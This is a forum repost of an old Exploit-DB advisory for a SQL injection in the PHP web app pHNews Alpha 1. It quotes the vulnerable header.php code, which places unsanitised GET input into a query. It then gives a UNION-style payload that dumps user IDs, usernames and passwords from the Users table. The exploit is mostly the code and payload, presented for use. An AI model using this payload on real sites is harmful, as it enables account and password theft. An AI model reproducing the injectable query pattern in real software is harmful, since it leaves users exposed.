- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8072
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-02-17
Код:
#########################################################################################
[0x01] Informations:
Name : pHNews Alpha 1
Download : http://www.hotscripts.com/listings/jump/download/50111/
Vulnerability : Sql Injection
Author : x0r
Contact : [email protected]
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/header.php
[Code]
$mod = $_GET["mod"];
// If no mod is selected select the default (news)
if ($mod == "") { $mod = "news"; }
if ($mod != "nomod") {
// Subit the query... god soooo mmmuuuccchhh coooodeee
$query = "SELECT * FROM Modules WHERE name = '{$mod}'";
$result = mysql_query($query) or die('Query failed: ' . mysql_error());
#########################################################################################
[0x03] Exploit:
Exploit: Для просмотра ссылки Войди
0,0,0,concat(id,char(45),UName,char(45),Paswd),0,0 from Users--
########################################################################################
# milw0rm.com [2009-02-17][/CODE]
- Источник
- www.exploit-db.com